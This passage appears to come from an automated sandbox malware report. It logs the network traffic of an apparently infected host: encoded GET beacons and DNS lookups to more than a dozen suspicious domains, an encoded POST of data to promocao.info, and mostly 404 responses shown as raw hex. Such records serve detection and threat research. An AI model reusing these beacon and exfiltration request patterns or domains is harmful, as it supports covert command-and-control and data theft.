              Source: global trafficHTTP traffic detected: GET /kxtt/?w0DDw=KH0hz6&1V=eC1oD4IhFSd/6jtM+gh2zJzzIbkctzW5zKGW4KqWLMPitrzcqar0FZhKX10RVuOt75j4smH0EDZzb9gyazsXhx4kXv42kRkXOBgymbjdyCqqE2F8kr6Zzpg= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.grimbo.boatsConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /a59t/?1V=4xL6Q7DrxWj99jxey6XhnD59kXlzpzVjNwylhh0vBKzMCs+5V4gzFQ4JFVb3bklsevH6tDeLKuQQ/YMUh7acuv+yDBW+TCFZeEjgS2d8Hc9PwvsiMDAZ0mc=&w0DDw=KH0hz6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.44756.pizzaConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /bowc/?w0DDw=KH0hz6&1V=hSFyBF7QNpd6wUow9uUe+oJ47NX8i/8WjK6IJxkbiJgyDGKURjVOywd5a/1i9fugKQVYW71g1Iqe5QUBl7nO+/1bJOK8Z/4V5qgzDPWvLYQmptlMfzF+8/0= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.lonfor.websiteConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /cf9p/?1V=tknvN2jlhTuvpXXYKbatHxztD/Ub9xeLNYYXG7/rIeGG9fe7kNXrAZC6u3EcgYD6CfYKVegcRI1iRuMeH9uFK+f9yqapepUfG+WEuydq9lZ8Jf8Ico0paCk=&w0DDw=KH0hz6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.investshares.netConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /hqr6/?1V=zX0jw1Jb7ql8GILhT0OEiPF9MmsqzXR3TcA9XJSzUhKPf0bKw3wcZTcOExSEJIWiFeUL4na64vamMH1j0X3tfc2GyGCINcJGtLdg83h47wzEv1WJs4WWtSs=&w0DDw=KH0hz6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.nosolofichas.onlineConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /jpjz/?1V=BsCB6j6XIP/wuAbzMvYD7rFnMTUj3QEoDDFnz1MrtzBPzJTq92en/EOyrjYaLx3w2H4L+FlVDICDydTs7KXcVAurUdDQdDmms6nVhCqDqAG2cNeT9xHcOvE=&w0DDw=KH0hz6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.jrcov55qgcxp5fwa.topConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /ctdy/?1V=5YPKgWGFQCLPNGrM6Bx2/r3NiP9oDWgtkX9bUS/ECNXraKmEQnwhGYNyQa7ZIE66IC9AyTOQsA8Uagq2DQsZFTIkqAxP+kzEnb1pVMGGKhBzsI5+lu+iJts=&w0DDw=KH0hz6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.adadev.infoConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /8rr3/?1V=iJ8hmWjdEFuk0u09mxt/i+URJBIu2+/oU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWg+eEASr+Wzr+b0deN6ZH6nrWdXOKgOfZXH6QuC8SwJrjPV5LCLXfvVQ=&w0DDw=KH0hz6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.cifasnc.infoConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /dx3i/?1V=d8Ky6hmePKhU2XxFS8oVbq/fBtR8/SXw2U4uZFU2PglJR/EsTh4FCVpvl1B6U0BHfI68a/67nkOplmDPjd8pdEnMsHk7sWiNdLPva59bl5hhAP4TZGe3ZV4=&w0DDw=KH0hz6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.denture-prices.clickConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /01c7/?1V=YTigy0/11EA1EDEWI2qwNPkZTl2Ew25ueN49sLqr1toXUas0k4bLkY/pThMrKnph3bjNfCydzgD9Nz90+/wReHsi0Sd5n3+/SqbRiWTP8J7rQ0imHyBBNkU=&w0DDw=KH0hz6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.sonixingenuine.shopConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /b9e2/?1V=KXKmlftrGUnNwN71qtFvViHh9QQKT49uyIFWo1edE1ybkp1zCkMUBe9/9dTIwO/9znAhfptP/ghbc5af4f99NMc1rtl+75eG21JCXkgtBEctrkJEqfktzAA=&w0DDw=KH0hz6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.moyu19.proConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficDNS traffic detected: DNS query: www.gayhxi.info
              Source: global trafficDNS traffic detected: DNS query: www.promocao.info
              Source: global trafficDNS traffic detected: DNS query: www.grimbo.boats
              Source: global trafficDNS traffic detected: DNS query: www.44756.pizza
              Source: global trafficDNS traffic detected: DNS query: www.lonfor.website
              Source: global trafficDNS traffic detected: DNS query: www.investshares.net
              Source: global trafficDNS traffic detected: DNS query: www.nosolofichas.online
              Source: global trafficDNS traffic detected: DNS query: www.jrcov55qgcxp5fwa.top
              Source: global trafficDNS traffic detected: DNS query: www.adadev.info
              Source: global trafficDNS traffic detected: DNS query: www.cifasnc.info
              Source: global trafficDNS traffic detected: DNS query: www.ebsmadrid.store
              Source: global trafficDNS traffic detected: DNS query: www.denture-prices.click
              Source: global trafficDNS traffic detected: DNS query: www.sonixingenuine.shop
              Source: global trafficDNS traffic detected: DNS query: www.moyu19.pro
              Source: unknownHTTP traffic detected: POST /zaz4/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflateHost: www.promocao.infoOrigin: http://www.promocao.infoCache-Control: max-age=0Content-Length: 199Connection: closeContent-Type: application/x-www-form-urlencodedReferer: http://www.promocao.info/zaz4/User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1Data Raw: 31 56 3d 58 39 76 6e 31 62 32 5a 30 41 74 43 54 57 56 4c 74 5a 37 6c 74 33 63 57 66 4c 59 46 49 54 65 6c 44 6d 49 4e 59 51 44 4d 50 47 49 70 69 6b 71 30 47 56 72 77 37 78 31 67 31 67 4e 73 78 48 4b 56 59 57 4e 35 30 78 78 7a 31 33 63 66 2f 69 56 6a 69 44 31 75 74 42 6b 50 6b 6d 49 45 2b 71 53 43 34 64 51 30 76 54 73 32 4b 43 61 46 4a 75 6d 62 63 74 4c 62 31 47 55 4c 30 7a 64 45 33 73 44 6a 64 34 78 78 4a 2f 58 59 75 69 41 54 69 49 30 4a 62 78 78 57 64 5a 51 72 51 56 43 54 41 44 63 7a 76 4f 6e 42 37 69 32 52 56 63 4b 2b 58 71 6c 39 6e 53 38 6a 7a 43 5a 61 50 4a 31 42 51 48 56 63 7a 67 3d 3d Data Ascii: 1V=X9vn1b2Z0AtCTWVLtZ7lt3cWfLYFITelDmINYQDMPGIpikq0GVrw7x1g1gNsxHKVYWN50xxz13cf/iVjiD1utBkPkmIE+qSC4dQ0vTs2KCaFJumbctLb1GUL0zdE3sDjd4xxJ/XYuiATiI0JbxxWdZQrQVCTADczvOnB7i2RVcK+Xql9nS8jzCZaPJ1BQHVczg==
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 Jan 2025 10:40:13 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fDiyxrkpkK%2FuFGML0uUap2rQ3EptqY%2FciHyVTk%2FNdUhiG4kev%2FShO5TweBIYXcFtkHMlwbI4rK8MJmw3cQZK%2B%2BmBhgD0TBQWou7b1hc4N8M5lF%2BFepssTAhFF9Tl22R7fequ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fc25e912fc780d6-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1588&min_rtt=1588&rtt_var=794&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=731&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\^U0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 Jan 2025 10:40:15 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T%2FUGwMqTdDiIcJ%2BONzJV8j27%2BqDZosSTp2pYPNUtQt7njdRmSvWk29Z15FzbqpSeELWxkW3qz%2FPje%2BVozuX%2F%2BqSqNOgKrpzQ4lYXCfPKG52R7FwUK%2B5NjdJN3J6JTorjTpY2"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fc25ea14f97428b-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1549&min_rtt=1549&rtt_var=774&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=751&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e4LAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\b^U0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 Jan 2025 10:40:18 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4CLRCpe2cnLf4N1URG%2BkjTJhyg0CluvUJbhOL%2Fystyo5JCe9G7Al9MreSp13dHPYMUYGFsCt7XgojiAjkC%2F3H1Z0AEevAlHa7DKOf0elEjdKsxR9uc7vlLd0qQg2dG9l0v6E"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fc25eb19b6a187d-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1623&min_rtt=1623&rtt_var=811&sent=5&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10833&delivery_rate=0&cwnd=150&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e4LAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\b^U0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 Jan 2025 10:40:20 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ly%2Fd9RibHA84VfMWqJwvyJ5obQbaW1gfczgzjCecOgQwB1eSOMtWx9AQFSWnL9Zfoq8UH4xvSHBOKRENJ%2BZvl0EXa95vtbvY%2FHUVvUOcC62S2xStTePS678fYAnMR7TajF14"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fc25ec1daa24239-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1579&min_rtt=1579&rtt_var=789&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=467&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 72 69 6d 62 6f 2e 62 6f 61 74 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 116<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.grimbo.boats Port 80</address></body></html>0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Fri, 03 Jan 2025 10:40:27 GMTEtag: "6743f11f-94"Server: nginxConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Fri, 03 Jan 2025 10:40:29 GMTEtag: "6743f11f-94"Server: nginxConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Fri, 03 Jan 2025 10:40:32 GMTEtag: "6743f11f-94"Server: nginxConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Fri, 03 Jan 2025 10:40:34 GMTEtag: "6743f11f-94"Server: nginxConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 Jan 2025 10:40:40 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 Jan 2025 10:40:43 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 